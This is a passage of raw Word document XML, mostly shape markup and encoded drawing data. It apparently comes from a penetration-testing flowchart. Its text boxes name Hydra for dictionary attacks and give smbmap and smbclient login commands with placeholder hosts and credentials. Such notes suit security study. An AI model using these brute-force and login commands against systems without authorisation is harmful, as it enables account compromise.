style="position:absolute;margin-left:4.6pt;margin-top:7.3pt;width:188.9pt;height:3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9030,4315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MjlAIAAG4FAAAOAAAAZHJzL2Uyb0RvYy54bWysVE1v2zAMvQ/YfxB0X+2kyboEdYogRYcB&#10;RRu0HXpmZCk2IIuapMTJfv0o2XGLtthhmA+yJJJP/Hjk5dWh0Wwvna/RFHx0lnMmjcCyNtuC/3y6&#10;+fKNMx/AlKDRyIIfpedXi8+fLls7l2OsUJfSMQIxft7aglch2HmWeVHJBvwZWmlIqNA1EOjotlnp&#10;oCX0RmfjPP+atehK61BI7+n2uhPyRcJXSopwr5SXgemCk28hrS6tm7hmi0uYbx3Yqha9G/APXjRQ&#10;G3p0gLqGAGzn6ndQTS0celThTGCToVK1kCkGimaUv4nmsQIrUyyUHG+HNPn/Byvu9mvH6rLgFzPO&#10;DDRUowfcmZJd17BFA5qt0Bmq0QPlEsxWS0aalLbW+jlZP9q160+etjEHB+Wa+Kfo2CGl+jikWh4C&#10;E3Q5Pp/N8nOqiCDZ5Hw0nV1E0OzF2jofvktsWNwU3EWnxtGp6EjKNexvfeiMTsqEEP3qPEm7cNQy&#10;OqPNg1QUaHw7WSeKyZV2bA9EDhBCmjDqRBWUsrue5vT1ng0Wyc8EGJFVrfWA3QNE+r7H7nzt9aOp&#10;TAwdjPO/OdYZDxbpZTRhMG5qg+4jAE1R9S93+qckdamJWQqHzSGRYDqJqvFqg+WRmOGwaxlvxU1N&#10;hbgFH9bgqEeodtT34Z4WpbEtOPY7zip0vz+6j/pEXZJy1lLPFdz/2oGTnOkfhkg9G00msUnTYTK9&#10;GNPBvZZsXkvMrlkhVW5EE8aKtI36QZ+2ymHzTONhGV8lERhBbxdcBHc6rEI3C2jACLlcJjVqTAvh&#10;1jxaEcFjoiO9ng7P4GzPxkA8vsNTf8L8DRU73WhpcLkLqOrE05e89iWgpk5c6gdQnBqvz0nrZUwu&#10;/gAAAP//AwBQSwMEFAAGAAgAAAAhANH2SrXZAAAABwEAAA8AAABkcnMvZG93bnJldi54bWxMj8FO&#10;hEAQRO8m/sOkTby5gyCIyLBRE68mrsZzL9MCyvQQZnbBv7c9ucfqqlS9rrerG9WR5jB4NnC9SUAR&#10;t94O3Bl4f3u+KkGFiGxx9EwGfijAtjk/q7GyfuFXOu5ip6SEQ4UG+hinSuvQ9uQwbPxELN6nnx1G&#10;kXOn7YyLlLtRp0lSaIcDy0KPEz311H7vDs4Alo8F+pcF0zWbv2KW595+5MZcXqwP96AirfE/DH/4&#10;gg6NMO39gW1Qo4G7VIJyvilAiZ2Vt/La3kCZFqCbWp/yN78AAAD//wMAUEsBAi0AFAAGAAgAAAAh&#10;ALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAU&#10;AAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAU&#10;AAYACAAAACEAhoZDI5QCAABuBQAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwEC&#10;LQAUAAYACAAAACEA0fZKtdkAAAAHAQAADwAAAAAAAAAAAAAAAADuBAAAZHJzL2Rvd25yZXYueG1s&#10;UEsFBgAAAAAEAAQA8wAAAPQFAAAAAA==&#10;" adj="-11796480,,5400" path="m71934,l2399030,r,l2399030,359663v,39728,-32206,71934,-71934,71934l,431597r,l,71934c,32206,32206,,71934,xe" fillcolor="#5b9bd5 [3204]" strokecolor="#1f4d78 [1604]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:formulas/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="71934,0;2399030,0;2399030,0;2399030,359663;2327096,431597;0,431597;0,431597;0,71934;71934,0" o:connectangles="0,0,0,0,0,0,0,0,0" textboxrect="0,0,2399030,431597"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="004A29C7" w:rsidRDefault="007A436E" w:rsidP="004A29C7">
                      <w:r w:rsidRPr="007D28B7">
                        <w:t>Hydra</w:t>
                      </w:r>
                      <w:r w:rsidR="004A29C7">
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidR="004A29C7">
                        <w:t>&gt;&gt; Dictionary attack</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="004A29C7" w:rsidRDefault="004A29C7" w:rsidP="00E67F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1E9A8F" wp14:editId="421C36CB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2550542</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>66992</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="382270" cy="442595"/>
                <wp:effectExtent l="7937" t="11113" r="44768" b="44767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CB7D" id="Down Arrow 86" o:spid="_x0000_s1026" type="#_x0000_t67" style="position:absolute;margin-left:200.85pt;margin-top:5.25pt;width:30.1pt;height:34.85pt;rotation:-90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U7hQIAACgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVE1v2zAMvQ/YfxB0X51kSdcGdYq0QYcB&#10;RVugHXpWZCkWoK9JSpzu1+9Jdvq1nob5IJAi9Ug+kj473xtNdiJE5WxNx0cjSoTlrlF2U9OfD1df&#10;TiiJidmGaWdFTZ9EpOeLz5/OOj8XE9c63YhAAGLjvPM1bVPy86qKvBWGxSPnhYVRumBYgho2VRNY&#10;B3Sjq8lodFx1LjQ+OC5ixO2qN9JFwZdS8HQrZRSJ6Joit1TOUM51PqvFGZtvAvOt4kMa7B+yMExZ&#10;BH2GWrHEyDaov6CM4sFFJ9MRd6ZyUiouSg2oZjx6V819y7wotYCc6J9piv8Plt/s7gJRTU1Pjimx&#10;zKBHK9dZsgzBdQSXYKjzcQ7He38XBi1CzOXuZTAkONA6PkY78BUWUBfZF5KfnkkW+0Q4Lr+eTCbf&#10;0AoO03Q6mZ3Ocoiqx8qYPsT0XThDslDTBtmUZAoy213H1Psf/PKb6LRqrpTWRQmb9aUOZMfQ9NnF&#10;6cXqEOKNm7akQ95IJmfDMHxSswTReNAR7YYSpjeYap5Cif3mdfwgSAneskYMoQsffbKDeyn0DU6u&#10;YsVi2z8ppn4ojUrYDK0MWtMz2yNpm8OIMtsDF7k/fUeytHbNE3pauoLKoudXCkGuWUx3LGC6cYmN&#10;Tbc4pHbgwA0SJa0Lvz+6z/4YOlgp6bAt4OfXlgVBif5hMY6n4+kUsKko09m3CZTw2rJ+bbFbc+nQ&#10;m3HJrojZP+mDKIMzj1jsZY4KE7McsftODMpl6rcYvwYulsvihpXyLF3be88zeOYp0/uwf2TBD+OU&#10;MIc37rBZbP5uoHrf/NK65TY5qcq0vfCKDmYF61h6Ofw68r6/1ovXyw9u8QcAAP//AwBQSwMEFAAG&#10;AAgAAAAhANTQs0rhAAAACQEAAA8AAABkcnMvZG93bnJldi54bWxMj8tOwzAQRfdI/IM1SOyoQ0pc&#10;GuJUFajlIRal5QPc2MQR8Tiy3Tbw9QwrWI7u0b1nqsXoenY0IXYeJVxPMmAGG687bCW871ZXt8Bi&#10;UqhV79FI+DIRFvX5WaVK7U/4Zo7b1DIqwVgqCTaloeQ8NtY4FSd+MEjZhw9OJTpDy3VQJyp3Pc+z&#10;THCnOqQFqwZzb03zuT04Cc9rl69mr2FtN09F+7172Dy+5EspLy/G5R2wZMb0B8OvPqlDTU57f0Ad&#10;WS9hOhdzQikopsAIuBFCANtLmBUF8Lri/z+ofwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4A&#10;AADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAA&#10;IQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAA&#10;IQBgL+U7hQIAACgFAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAI&#10;AAAAIQDU0LNK4QAAAAkBAAAPAAAAAAAAAAAAAAAAAN8EAABkcnMvZG93bnJldi54bWxQSwUGAAAA&#10;AAQABADzAAAA7QUAAAAA&#10;" adj="12272" fillcolor="#5b9bd5" strokecolor="#41719c" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D28B7" w:rsidRDefault="007D28B7" w:rsidP="007D28B7"/>
    <w:p w:rsidR="007D28B7" w:rsidRPr="007D28B7" w:rsidRDefault="004A29C7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BC025D" wp14:editId="17B36641">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>58522</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>150774</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2399030" cy="380365"/>
                <wp:effectExtent l="0" t="0" r="20320" b="19685"/>
                <wp:wrapNone/>
                <wp:docPr id="80" name="Round Diagonal Corner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3803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36E" w:rsidRDefault="007A436E" w:rsidP="007A436E">
                            <w:r w:rsidRPr="007D28B7">
                              <w:t>smbmap &gt;&gt; Login Access</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="007A436E" w:rsidRDefault="007A436E" w:rsidP="00E67F88">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r w:rsidRPr="007D28B7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025D" id="Round Diagonal Corner Rectangle 80" o:spid="_x0000_s1081" style="position:absolute;margin-left:4.6pt;margin-top:11.85pt;width:188.9pt;height:29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90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n/kgIAAG4FAAAOAAAAZHJzL2Uyb0RvYy54bWysVN9P2zAQfp+0/8Hy+0jaUgYVKaqKmCYh&#10;hoCJZ9exm0iOzzu7Tbq/fmcnDQjQHqb1IbV9d9/9+u4ur7rGsL1CX4Mt+OQk50xZCWVttwX/+XTz&#10;5ZwzH4QthQGrCn5Qnl8tP3+6bN1CTaECUypkBGL9onUFr0JwiyzzslKN8CfglCWhBmxEoCtusxJF&#10;S+iNyaZ5fpa1gKVDkMp7er3uhXyZ8LVWMvzQ2qvATMEptpC+mL6b+M2Wl2KxReGqWg5hiH+IohG1&#10;Jacj1LUIgu2wfgfV1BLBgw4nEpoMtK6lSjlQNpP8TTaPlXAq5ULF8W4sk/9/sPJuf4+sLgt+TuWx&#10;oqEePcDOluy6FluwwrA1oKUePVAthd0axUiTytY6vyDrR3ePw83TMdag09jEf8qOdanUh7HUqgtM&#10;0uN0dnGRz8ilJNnsPJ+dzSNo9mLt0IdvChoWDwXHGNQ0BhUDSbUW+1sfeqOjMiHEuPpI0ikcjIrB&#10;GPugNCUafSfrRDG1Nsj2gsghpFQ2THpRJUrVP89z+g2RjRYpzgQYkXVtzIg9AET6vsfuYx30o6lK&#10;DB2N878F1huPFskz2DAaN7UF/AjAUFaD517/WKS+NLFKodt0iQTz1IX4tIHyQMxA6EfGO3lTUyNu&#10;hQ/3AmlGqHc09+EHfbSBtuAwnDirAH9/9B71ibok5aylmSu4/7UTqDgz3y2R+mJyehqHNF1O51+n&#10;dMHXks1rid01a6DOTWjDOJmOUT+Y41EjNM+0HlbRK4mEleS74DLg8bIO/S6gBSPVapXUaDCdCLf2&#10;0ckIHgsd6fXUPQt0AxsD8fgOjvMpFm+o2OtGSwurXQBdJ56+1HVoAQ114tKwgOLWeH1PWi9rcvkH&#10;AAD//wMAUEsDBBQABgAIAAAAIQC/Ujzs4AAAAAcBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9LT8Mw&#10;EITvSPwHa5G4IOqQSEkI2VRQqUdeBfG4ucmSRI3tYLtN4NeznOA4mtHMN+Vy1oM4kPO9NQgXiwgE&#10;mdo2vWkRnp/W5zkIH5Rp1GANIXyRh2V1fFSqorGTeaTDJrSCS4wvFEIXwlhI6euOtPILO5Jh78M6&#10;rQJL18rGqYnL9SDjKEqlVr3hhU6NtOqo3m32GuH1ZXLrvj7Ldjd337f32erz7eE9RTw9ma+vQASa&#10;w18YfvEZHSpm2tq9abwYEC5jDiLESQaC7STP+NoWIU9SkFUp//NXPwAAAP//AwBQSwECLQAUAAYA&#10;CAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBL&#10;AQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BL&#10;AQItABQABgAIAAAAIQANsvn/kgIAAG4FAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnht&#10;bFBLAQItABQABgAIAAAAIQC/Ujzs4AAAAAcBAAAPAAAAAAAAAAAAAAAAAOwEAABkcnMvZG93bnJl&#10;di54bWxQSwUGAAAAAAQABADzAAAA+QUAAAAA&#10;" adj="-11796480,,5400" path="m63395,l2399030,r,l2399030,316970v,35012,-28383,63395,-63395,63395l,380365r,l,63395c,28383,28383,,63395,xe" fillcolor="#5b9bd5 [3204]" strokecolor="#1f4d78 [1604]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:formulas/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="63395,0;2399030,0;2399030,0;2399030,316970;2335635,380365;0,380365;0,380365;0,63395;63395,0" o:connectangles="0,0,0,0,0,0,0,0,0" textboxrect="0,0,2399030,380365"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="007A436E" w:rsidRDefault="007A436E" w:rsidP="007A436E">
                      <w:r w:rsidRPr="007D28B7">
                        <w:t>smbmap &gt;&gt; Login Access</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="007A436E" w:rsidRDefault="007A436E" w:rsidP="00E67F88">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r w:rsidRPr="007D28B7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7EEEA0" wp14:editId="5595416C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3043122</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>158090</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2881173" cy="372745"/>
                <wp:effectExtent l="0" t="0" r="14605" b="2730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3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B7" w:rsidRDefault="007D28B7" w:rsidP="007A436E">
                            <w:r w:rsidRPr="007D28B7">
                              <w:t>smbmap -H IP-addr -u admin -P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EEEA0" id="Rounded Rectangle 35" o:spid="_x0000_s1082" style="position:absolute;margin-left:239.6pt;margin-top:12.45pt;width:226.85pt;height:29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KZcwIAADgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVG1P2zAQ/j5p/8Hy95GmFMoqUlSBmCYh&#10;QMDEZ9ex22iOzzu7Tbpfv7PzAmJIm6Z9cXy59+ee8/lFWxu2V+grsAXPjyacKSuhrOym4N+erj+d&#10;ceaDsKUwYFXBD8rzi+XHD+eNW6gpbMGUChkFsX7RuIJvQ3CLLPNyq2rhj8ApS0oNWItAIm6yEkVD&#10;0WuTTSeT06wBLB2CVN7T36tOyZcpvtZKhjutvQrMFJxqC+nEdK7jmS3PxWKDwm0r2Zch/qGKWlSW&#10;ko6hrkQQbIfVb6HqSiJ40OFIQp2B1pVUqQfqJp+86eZxK5xKvRA43o0w+f8XVt7u75FVZcGPTziz&#10;oqYZPcDOlqpkD4SesBujGOkIqMb5Bdk/unvsJU/X2HWrsY5f6oe1CdzDCK5qA5P0c3p2lufzY84k&#10;6Y7n0/ksBc1evB368EVBzeKl4BjLiDUkYMX+xgdKS/aDHQmxpK6IdAsHo2Idxj4oTV1R2jx5Jz6p&#10;S4NsL4gJQkplw5A/WUc3XRkzOk7/7NjbR1eVuDY6/0XW0SNlBhtG57qygO9lL7/ncQ4Ege7sBwS6&#10;viMEoV23aZwnp8PI1lAeaMYIHfm9k9cVAXwjfLgXSGynvaANDnd0aANNwaG/cbYF/Pne/2hPJCQt&#10;Zw1tT8H9j51AxZn5aomen/PZLK5bEmYn8ykJ+Fqzfq2xu/oSaCw5vRVOpmu0D2a4aoT6mRZ9FbOS&#10;SlhJuQsuAw7CZei2mp4KqVarZEYr5kS4sY9ODkSI3HlqnwW6nmWB+HkLw6aJxRuedbZxRBZWuwC6&#10;SiSMUHe49iOg9UyD6Z+SuP+v5WT18uAtfwEAAP//AwBQSwMEFAAGAAgAAAAhAHO/oF3dAAAACQEA&#10;AA8AAABkcnMvZG93bnJldi54bWxMj8tOwzAQRfdI/IM1SOyogxu1TYhTUQQLlrR8wDSeJlHjcRQ7&#10;D/h6zAp2M5qjO+cW+8V2YqLBt441PK4SEMSVMy3XGj5Pbw87ED4gG+wck4Yv8rAvb28KzI2b+YOm&#10;Y6hFDGGfo4YmhD6X0lcNWfQr1xPH28UNFkNch1qaAecYbjupkmQjLbYcPzTY00tD1fU4Wg2v5nAx&#10;71cetwfr++85VZhMSuv7u+X5CUSgJfzB8Ksf1aGMTmc3svGi05BuMxVRDSrNQEQgW6s4nDXs1huQ&#10;ZSH/Nyh/AAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAA&#10;AABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAA&#10;AAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAEktsplzAgAAOAUAAA4AAAAAAAAA&#10;AAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAHO/oF3dAAAACQEAAA8AAAAA&#10;AAAAAAAAAAAAzQ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D28B7" w:rsidRDefault="007D28B7" w:rsidP="007A436E">
                      <w:r w:rsidRPr="007D28B7">
                        <w:t>smbmap -H IP-addr -u admin -P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1E9A8F" wp14:editId="421C36CB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2546008</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>129616</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="382270" cy="442595"/>
                <wp:effectExtent l="7937" t="11113" r="44768" b="44767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FF3D" id="Down Arrow 87" o:spid="_x0000_s1026" type="#_x0000_t67" style="position:absolute;margin-left:200.45pt;margin-top:10.2pt;width:30.1pt;height:34.85pt;rotation:-90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pnhQIAACgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVNtu2zAMfR+wfxD0vjrJkl6COkXaoMOA&#10;Yi3QDn1WZCkWoNskJU739TuSnd7Wp2F+EEiROiQPSZ9f7I0mOxGicram46MRJcJy1yi7qenPh+sv&#10;p5TExGzDtLOipk8i0ovF50/nnZ+LiWudbkQgALFx3vmatin5eVVF3grD4pHzwsIoXTAsQQ2bqgms&#10;A7rR1WQ0Oq46FxofHBcx4nbVG+mi4EspeLqVMopEdE2RWypnKOc6n9XinM03gflW8SEN9g9ZGKYs&#10;gj5DrVhiZBvUX1BG8eCik+mIO1M5KRUXpQZUMx69q+a+ZV6UWkBO9M80xf8Hy3/s7gJRTU1PTyix&#10;zKBHK9dZsgzBdQSXYKjzcQ7He38XBi1CzOXuZTAkONA6PkY78BUWUBfZF5KfnkkW+0Q4Lr+eTiYn&#10;aAWHaTqdzM5mOUTVY2VMH2L6JpwhWahpg2xKMgWZ7W5i6v0PfvlNdFo110rrooTN+koHsmNo+uzy&#10;7HJ1CPHGTVvSIW8kk7NhGD6pWYJoPOiIdkMJ0xtMNU+hxH7zOn4QpARvWSOG0IWPPtnBvRT6BidX&#10;sWKx7Z8UUz+URiVshlYGremZ7ZG0zWFEme2Bi9yfviNZWrvmCT0tXUFl0fNrhSA3LKY7FjDduMTG&#10;plscUjtw4AaJktaF3x/dZ38MHayUdNgW8PNry4KgRH+3GMez8XQK2FSU6exkAiW8tqxfW+zWXDn0&#10;ZlyyK2L2T/ogyuDMIxZ7maPCxCxH7L4Tg3KV+i3Gr4GL5bK4YaU8Szf23vMMnnnK9D7sH1nwwzgl&#10;zOEPd9gsNn83UL1vfmndcpucVGXaXnhFB7OCdSy9HH4ded9f68Xr5Qe3+AMAAP//AwBQSwMEFAAG&#10;AAgAAAAhAGtC6f/hAAAACQEAAA8AAABkcnMvZG93bnJldi54bWxMj8tOwzAQRfdI/IM1SOyoU9OE&#10;EjKpKlDLQyxKywe4sYkj4nFku23g6zErWI7m6N5zq8Voe3bUPnSOEKaTDJimxqmOWoT33epqDixE&#10;SUr2jjTClw6wqM/PKlkqd6I3fdzGlqUQCqVEMDEOJeehMdrKMHGDpvT7cN7KmE7fcuXlKYXbnoss&#10;K7iVHaUGIwd9b3TzuT1YhOe1FaubV782m6e8/d49bB5fxBLx8mJc3gGLeox/MPzqJ3Wok9PeHUgF&#10;1iNc3xbThCKIXABLwKzI05Y9wjyfAa8r/n9B/QMAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4A&#10;AADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAA&#10;IQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAA&#10;IQD8wvpnhQIAACgFAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAI&#10;AAAAIQBrQun/4QAAAAkBAAAPAAAAAAAAAAAAAAAAAN8EAABkcnMvZG93bnJldi54bWxQSwUGAAAA&#10;AAQABADzAAAA7QUAAAAA&#10;" adj="12272" fillcolor="#5b9bd5" strokecolor="#41719c" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D28B7" w:rsidRDefault="007D28B7" w:rsidP="007D28B7"/>
    <w:p w:rsidR="008F1106" w:rsidRDefault="008D602E" w:rsidP="007D28B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6CED82" wp14:editId="5CE07688">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3042920</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>281635</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2881173" cy="438912"/>
                <wp:effectExtent l="0" t="0" r="14605" b="1841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3" cy="4389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6E" w:rsidRDefault="007A436E" w:rsidP="008D602E">
                            <w:r w:rsidRPr="007D28B7">
                              <w:t>smbclient -L IP_addr -U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CED82" id="Rounded Rectangle 82" o:spid="_x0000_s1083" style="position:absolute;margin-left:239.6pt;margin-top:22.2pt;width:226.85pt;height:34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ZcdAIAADgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVG1P2zAQ/j5p/8Hy95GmlFEqUlSBmCYh&#10;QMDEZ9ex22iOzzu7Tbpfv7PzAmJIm6Z9cXy59+ee8/lFWxu2V+grsAXPjyacKSuhrOym4N+erj/N&#10;OfNB2FIYsKrgB+X5xfLjh/PGLdQUtmBKhYyCWL9oXMG3IbhFlnm5VbXwR+CUJaUGrEUgETdZiaKh&#10;6LXJppPJ56wBLB2CVN7T36tOyZcpvtZKhjutvQrMFJxqC+nEdK7jmS3PxWKDwm0r2Zch/qGKWlSW&#10;ko6hrkQQbIfVb6HqSiJ40OFIQp2B1pVUqQfqJp+86eZxK5xKvRA43o0w+f8XVt7u75FVZcHnU86s&#10;qGlGD7CzpSrZA6En7MYoRjoCqnF+QfaP7h57ydM1dt1qrOOX+mFtAvcwgqvawCT9nM7neX56zJkk&#10;3ex4fpanoNmLt0MfviioWbwUHGMZsYYErNjf+EBpyX6wIyGW1BWRbuFgVKzD2AelqStKmyfvxCd1&#10;aZDtBTFBSKlsOIlNUbxkHd10ZczoOP2zY28fXVXi2uj8F1lHj5QZbBid68oCvpe9/J73JevOfkCg&#10;6ztCENp1m8Z5cjqMbA3lgWaM0JHfO3ldEcA3wod7gcR22gva4HBHhzbQFBz6G2dbwJ/v/Y/2RELS&#10;ctbQ9hTc/9gJVJyZr5boeZbPZnHdkjA7OZ2SgK8169cau6svgcaS01vhZLpG+2CGq0aon2nRVzEr&#10;qYSVlLvgMuAgXIZuq+mpkGq1Sma0Yk6EG/vo5ECEyJ2n9lmg61kWiJ+3MGyaWLzhWWcbR2RhtQug&#10;q0TCCHWHaz8CWs/Epf4pifv/Wk5WLw/e8hcAAAD//wMAUEsDBBQABgAIAAAAIQDKv+PA3QAAAAoB&#10;AAAPAAAAZHJzL2Rvd25yZXYueG1sTI/LTsMwEEX3SPyDNUjsqFM3UBLiVBTBgmULH+DG0yRqPI5i&#10;5wFfz7CC3Yzm6M65xW5xnZhwCK0nDetVAgKp8ralWsPnx9vdI4gQDVnTeUINXxhgV15fFSa3fqYD&#10;TsdYCw6hkBsNTYx9LmWoGnQmrHyPxLezH5yJvA61tIOZOdx1UiXJg3SmJf7QmB5fGqwux9FpeLX7&#10;s32/0Ljdu9B/z6kyyaS0vr1Znp9ARFziHwy/+qwOJTud/Eg2iE5Dus0UozykKQgGso3KQJyYXG/u&#10;QZaF/F+h/AEAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAA&#10;AAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAA&#10;AAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAs9PZcdAIAADgFAAAOAAAAAAAA&#10;AAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQDKv+PA3QAAAAoBAAAPAAAA&#10;AAAAAAAAAAAAAM4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A436E" w:rsidRDefault="007A436E" w:rsidP="008D602E">
                      <w:r w:rsidRPr="007D28B7">
                        <w:t>smbclient -L IP_addr -U username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1106" w:rsidRDefault="004A29C7" w:rsidP="008F110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38F92E" wp14:editId="55BC47B4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>58522</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>76251</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2399030" cy="380365"/>
                <wp:effectExtent l="0" t="0" r="20320" b="19685"/>
                <wp:wrapNone/>
                <wp:docPr id="81" name="Round Diagonal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030" cy="3803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36E" w:rsidRDefault="007A436E" w:rsidP="00F47F10">
                            <w:r w:rsidRPr="007D28B7">
                              <w:t xml:space="preserve">smbclient  &gt;&gt; Login Access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F92E" id="Round Diagonal Corner Rectangle 81" o:spid="_x0000_s1084" style="position:absolute;margin-left:4.6pt;margin-top:6pt;width:188.9pt;height:29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9030,380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KHlAIAAG4FAAAOAAAAZHJzL2Uyb0RvYy54bWysVE1v2zAMvQ/YfxB0X+0kTZcGdYogRYcB&#10;RVv0Az0zspQYkEVNUmJnv36U7LhFW+wwLAdHEsmnR/JRF5dtrdleOl+hKfjoJOdMGoFlZTYFf366&#10;/jbjzAcwJWg0suAH6fnl4uuXi8bO5Ri3qEvpGIEYP29swbch2HmWebGVNfgTtNKQUaGrIdDWbbLS&#10;QUPotc7GeX6WNehK61BI7+n0qjPyRcJXSopwp5SXgemCE7eQvi591/GbLS5gvnFgt5XoacA/sKih&#10;MnTpAHUFAdjOVR+g6ko49KjCicA6Q6UqIVMOlM0of5fN4xasTLlQcbwdyuT/H6y43d87VpUFn404&#10;M1BTjx5wZ0p2VcEGDWi2QmeoRw9USzAbLRl5Utka6+cU/WjvXb/ztIw1aJWr4z9lx9pU6sNQatkG&#10;JuhwPDk/zyfUEUG2ySyfnE0jaPYabZ0PPyTWLC4K7iKpcSQViaRaw/7Ghy7o6EwIkVfHJK3CQctI&#10;RpsHqSjReHeKThKTK+3YHkgcIIQ0YdSZtlDK7nia069nNkQkngkwIqtK6wG7B4jy/Yjdce39Y6hM&#10;Ch2C878R64KHiHQzmjAE15VB9xmApqz6mzv/Y5G60sQqhXbdJhFMZ9E1Hq2xPJAyHHYj4624rqgR&#10;N+DDPTiaEeodzX24o4/S2BQc+xVnW3S/PzuP/iRdsnLW0MwV3P/agZOc6Z+GRH0+Oj2NQ5o2p9Pv&#10;Y9q4t5b1W4vZ1SukzpFuiV1aRv+gj0vlsH6h52EZbyUTGEF3F1wEd9ysQvcW0AMj5HKZ3GgwLYQb&#10;82hFBI+FjvJ6al/A2V6NgXR8i8f5hPk7KXa+MdLgchdQVUmnr3XtW0BDnbTUP0Dx1Xi7T16vz+Ti&#10;DwAAAP//AwBQSwMEFAAGAAgAAAAhAMIJ0LjgAAAABwEAAA8AAABkcnMvZG93bnJldi54bWxMj81O&#10;wzAQhO9IvIO1SFwQdRqkpg1xKqjUI1AK4ufmxksSNV4H220CT89ygtvuzmj2m2I52k4c0YfWkYLp&#10;JAGBVDnTUq3g+Wl9OQcRoiajO0eo4AsDLMvTk0Lnxg30iMdtrAWHUMi1gibGPpcyVA1aHSauR2Lt&#10;w3mrI6++lsbrgcNtJ9MkmUmrW+IPje5x1WC13x6sgteXwa/b6iLb395/3z1kq8+3zftMqfOz8eYa&#10;RMQx/pnhF5/RoWSmnTuQCaJTsEjZyOeUG7F8Nc942CnIpguQZSH/85c/AAAA//8DAFBLAQItABQA&#10;BgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1s&#10;UEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxz&#10;UEsBAi0AFAAGAAgAAAAhAO0RkoeUAgAAbgUAAA4AAAAAAAAAAAAAAAAA